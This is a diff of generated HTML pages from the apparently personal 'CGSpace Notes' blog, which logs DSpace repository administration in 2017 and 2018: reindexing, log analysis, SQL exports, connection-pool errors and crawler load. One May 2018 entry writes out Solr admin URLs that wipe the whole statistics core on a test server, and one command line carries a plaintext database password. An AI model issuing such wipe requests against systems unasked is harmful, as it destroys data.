+<li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li>
+<li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
+</code></pre><ul>
+<li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="/cgspace-notes/2018-03/">March, 2018</a></li>
+<li>Time to index ~70,000 items on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b                                  
+
+real    74m42.646s
+user    8m5.056s
+sys     2m7.289s
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-05/">May, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-05-01T16:43:54+03:00">Tue May 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-05-01">2018-05-01</h2>
+<ul>
+<li>I cleared the Solr statistics core on DSpace Test by issuing two commands directly to the Solr admin interface:
+<ul>
+<li>http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E</li>
+<li>http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E</li>
+</ul>
+</li>
+<li>Then I reduced the JVM heap size from 6144 back to 5120m</li>
+<li>Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a> to support hosts choosing which distribution they want to use</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-04/">April, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-04-01T16:13:54+02:00">Sun Apr 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-04-01">2018-04-01</h2>
+<ul>
+<li>I tried to test something on DSpace Test but noticed that it&rsquo;s down since god knows when</li>
+<li>Catalina logs at least show some memory errors yesterday:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-03/">March, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-03-02T16:07:54+02:00">Fri Mar 02, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-03-02">2018-03-02</h2>
+<ul>
+<li>Export a CSV of the IITA community metadata for Martin Mueller</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-02/">February, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-02-01T16:28:54+02:00">Thu Feb 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-02-01">2018-02-01</h2>
+<ul>
+<li>Peter gave feedback on the <code>dc.rights</code> proof of concept that I had sent him last week</li>
+<li>We don&rsquo;t need to distinguish between internal and external works, so that makes it just a simple list</li>
+<li>Yesterday I figured out how to monitor DSpace sessions using JMX</li>
+<li>I copied the logic in the <code>jmx_tomcat_dbpools</code> provided by Ubuntu&rsquo;s <code>munin-plugins-java</code> package and used the stuff I discovered about JMX <a href="/cgspace-notes/2018-01/">in 2018-01</a></li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-01/">January, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-01-02T08:35:54-08:00">Tue Jan 02, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-01-02">2018-01-02</h2>
+<ul>
+<li>Uptime Robot noticed that CGSpace went down and up a few times last night, for a few minutes each time</li>
+<li>I didn&rsquo;t get any load alerts from Linode and the REST and XMLUI logs don&rsquo;t show anything out of the ordinary</li>
+<li>The nginx logs show HTTP 200s until <code>02/Jan/2018:11:27:17 +0000</code> when Uptime Robot got an HTTP 500</li>
+<li>In dspace.log around that time I see many errors like &ldquo;Client closed the connection before file download was complete&rdquo;</li>
+<li>And just before that I see this:</li>
+</ul>
+<pre tabindex="0"><code>Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000].
+</code></pre><ul>
+<li>Ah hah! So the pool was actually empty!</li>
+<li>I need to increase that, let&rsquo;s try to bump it up from 50 to 75</li>
+<li>After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&rsquo;t know what the hell Uptime Robot saw</li>
+<li>I notice this error quite a few times in dspace.log:</li>
+</ul>
+<pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
+org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
+</code></pre><ul>
+<li>And there are many of these errors every day for the past month:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
+dspace.log.2017-11-21:4
+dspace.log.2017-11-22:1
+dspace.log.2017-11-23:4
+dspace.log.2017-11-24:11
+dspace.log.2017-11-25:0
+dspace.log.2017-11-26:1
+dspace.log.2017-11-27:7
+dspace.log.2017-11-28:21
+dspace.log.2017-11-29:31
+dspace.log.2017-11-30:15
+dspace.log.2017-12-01:15
+dspace.log.2017-12-02:20
+dspace.log.2017-12-03:38
+dspace.log.2017-12-04:65
+dspace.log.2017-12-05:43
+dspace.log.2017-12-06:72
+dspace.log.2017-12-07:27
+dspace.log.2017-12-08:15
+dspace.log.2017-12-09:29
+dspace.log.2017-12-10:35
+dspace.log.2017-12-11:20
+dspace.log.2017-12-12:44
+dspace.log.2017-12-13:36
+dspace.log.2017-12-14:59
+dspace.log.2017-12-15:104
+dspace.log.2017-12-16:53
+dspace.log.2017-12-17:66
+dspace.log.2017-12-18:83
+dspace.log.2017-12-19:101
+dspace.log.2017-12-20:74
+dspace.log.2017-12-21:55
+dspace.log.2017-12-22:66
+dspace.log.2017-12-23:50
+dspace.log.2017-12-24:85
+dspace.log.2017-12-25:62
+dspace.log.2017-12-26:49
+dspace.log.2017-12-27:30
+dspace.log.2017-12-28:54
+dspace.log.2017-12-29:68
+dspace.log.2017-12-30:89
+dspace.log.2017-12-31:53
+dspace.log.2018-01-01:45
+dspace.log.2018-01-02:34
+</code></pre><ul>
+<li>Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let&rsquo;s Encrypt if it&rsquo;s just a handful of domains</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-12/">December, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-12-01T13:53:54+03:00">Fri Dec 01, 2017</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2017-12-01">2017-12-01</h2>
+<ul>
+<li>Uptime Robot noticed that CGSpace went down</li>
+<li>The logs say &ldquo;Timeout waiting for idle object&rdquo;</li>
+<li>PostgreSQL activity says there are 115 connections currently</li>
+<li>The list of connections to XMLUI and REST API for today:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/page/6/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/page/8/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/page/8/index.html b/docs/page/8/index.html
new file mode 100644
index 000000000..0efb19c5d
--- /dev/null
+++ b/docs/page/8/index.html
@@ -0,0 +1,444 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="CGSpace Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="CGSpace Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link active" href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-11/">November, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-11-02T09:37:54+02:00">Thu Nov 02, 2017</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2017-11-01">2017-11-01</h2>
+<ul>
+<li>The CORE developers responded to say they are looking into their bot not respecting our robots.txt</li>
+</ul>
+<h2 id="2017-11-02">2017-11-02</h2>
+<ul>
+<li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log
+0
+</code></pre><ul>
+<li>Generate list of authors on CGSpace for Peter to go through and correct:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
+COPY 54701
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-10/">October, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-10-01T08:07:54+03:00">Sun Oct 01, 2017</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2017-10-01">2017-10-01</h2>
+<ul>
+<li>Peter emailed to point out that many items in the <a href="https://cgspace.cgiar.org/handle/10568/2703">ILRI archive collection</a> have multiple handles:</li>
+</ul>
+<pre tabindex="0"><code>http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
+</code></pre><ul>
+<li>There appears to be a pattern but I&rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine</li>
+<li>Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/cgiar-library-migration/">CGIAR Library Migration</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-09-18T16:38:35+03:00">Mon Sep 18, 2017</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/migration/" rel="tag">Migration</a>
+
+</p>
+  </header>
+  <p>Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called <em>CGIAR System Organization</em>.</p>
+  <a href='https://alanorth.github.io/cgspace-notes/cgiar-library-migration/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-09/">September, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-09-07T16:54:52+07:00">Thu Sep 07, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-09-06">2017-09-06</h2>
+<ul>
+<li>Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two hours</li>
+</ul>
+<h2 id="2017-09-07">2017-09-07</h2>
+<ul>
+<li>Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account is both in the approvers step as well as the group</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-08/">August, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-08-01T11:51:52+03:00">Tue Aug 01, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-08-01">2017-08-01</h2>
+<ul>
+<li>Linode sent an alert that CGSpace (linode18) was using 350% CPU for the past two hours</li>
+<li>I looked in the Activity pane of the Admin Control Panel and it seems that Google, Baidu, Yahoo, and Bing are all crawling with massive numbers of bots concurrently (~100 total, mostly Baidu and Google)</li>
+<li>The good thing is that, according to <code>dspace.log.2017-08-01</code>, they are all using the same Tomcat session</li>
+<li>This means our Tomcat Crawler Session Valve is working</li>
+<li>But many of the bots are browsing dynamic URLs like:
+<ul>
+<li>/handle/10568/3353/discover</li>
+<li>/handle/10568/16510/browse</li>
+</ul>
+</li>
+<li>The <code>robots.txt</code> only blocks the top-level <code>/discover</code> and <code>/browse</code> URLs&hellip; we will need to find a way to forbid them from accessing these!</li>
+<li>Relevant issue from DSpace Jira (semi resolved in DSpace 6.0): <a href="https://jira.duraspace.org/browse/DS-2962">https://jira.duraspace.org/browse/DS-2962</a></li>
+<li>It turns out that we&rsquo;re already adding the <code>X-Robots-Tag &quot;none&quot;</code> HTTP header, but this only forbids the search engine from <em>indexing</em> the page, not crawling it!</li>
+<li>Also, the bot has to successfully browse the page first so it can receive the HTTP header&hellip;</li>
+<li>We might actually have to <em>block</em> these requests with HTTP 403 depending on the user agent</li>
+<li>Abenet pointed out that the CGIAR Library Historical Archive collection I sent July 20th only had ~100 entries, instead of 2415</li>
+<li>This was due to newline characters in the <code>dc.description.abstract</code> column, which caused OpenRefine to choke when exporting the CSV</li>
+<li>I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using <code>g/^$/d</code></li>
+<li>Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-07/">July, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-07-01T18:03:52+03:00">Sat Jul 01, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-07-01">2017-07-01</h2>
+<ul>
+<li>Run system updates and reboot DSpace Test</li>
+</ul>
+<h2 id="2017-07-04">2017-07-04</h2>
+<ul>
+<li>Merge changes for WLE Phase II theme rename (<a href="https://github.com/ilri/DSpace/pull/329">#329</a>)</li>
+<li>Looking at extracting the metadata registries from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace</li>
+<li>We can use PostgreSQL&rsquo;s extended output format (<code>-x</code>) plus <code>sed</code> to format the output into quasi XML:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-06/">June, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-06-01T10:14:52+03:00">Thu Jun 01, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg.
+  <a href='https://alanorth.github.io/cgspace-notes/2017-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-05/">May, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-05-01T16:21:52+02:00">Mon May 01, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace.
+  <a href='https://alanorth.github.io/cgspace-notes/2017-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-04/">April, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-04-02T17:08:52+02:00">Sun Apr 02, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-04-02">2017-04-02</h2>
+<ul>
+<li>Merge one change to CCAFS flagships that I had forgotten to remove last month (&ldquo;MANAGING CLIMATE RISK&rdquo;): <a href="https://github.com/ilri/DSpace/pull/317">https://github.com/ilri/DSpace/pull/317</a></li>
+<li>Quick proof-of-concept hack to add <code>dc.rights</code> to the input form, including some inline instructions/hints:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/04/dc-rights.png" alt="dc.rights in the submission form"></p>
+<ul>
+<li>Remove redundant/duplicate text in the DSpace submission license</li>
+<li>Testing the CMYK patch on a collection with 650 items:</li>
+</ul>
+<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-03/">March, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-03-01T17:08:52+02:00">Wed Mar 01, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-03-01">2017-03-01</h2>
+<ul>
+<li>Run the 279 CIAT author corrections on CGSpace</li>
+</ul>
+<h2 id="2017-03-02">2017-03-02</h2>
+<ul>
+<li>Skype with Michael and Peter, discussing moving the CGIAR Library to CGSpace</li>
+<li>CGIAR people possibly open to moving content, redirecting library.cgiar.org to CGSpace and letting CGSpace resolve their handles</li>
+<li>They might come in at the top level in one &ldquo;CGIAR System&rdquo; community, or with several communities</li>
+<li>I need to spend a bit of time looking at the multiple handle support in DSpace and see if new content can be minted in both handles, or just one?</li>
+<li>Need to send Peter and Michael some notes about this in a few days</li>
+<li>Also, need to consider talking to Atmire about hiring them to bring ORCiD metadata to REST / OAI</li>
+<li>Filed an issue on DSpace issue tracker for the <code>filter-media</code> bug that causes it to process JPGs even when limiting to the PDF thumbnail plugin: <a href="https://jira.duraspace.org/browse/DS-3516">DS-3516</a></li>
+<li>Discovered that the ImageMagic <code>filter-media</code> plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK</li>
+<li>Interestingly, it seems DSpace 4.x&rsquo;s thumbnails were sRGB, but forcing regeneration using DSpace 5.x&rsquo;s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see <a href="https://cgspace.cgiar.org/handle/10568/51999">10568/51999</a>):</li>
+</ul>
+<pre tabindex="0"><code>$ identify ~/Desktop/alc_contrastes_desafios.jpg
+/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/page/7/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/page/9/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/page/9/index.html b/docs/page/9/index.html
new file mode 100644
index 000000000..de33ad9ed
--- /dev/null
+++ b/docs/page/9/index.html
@@ -0,0 +1,453 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="CGSpace Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="CGSpace Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
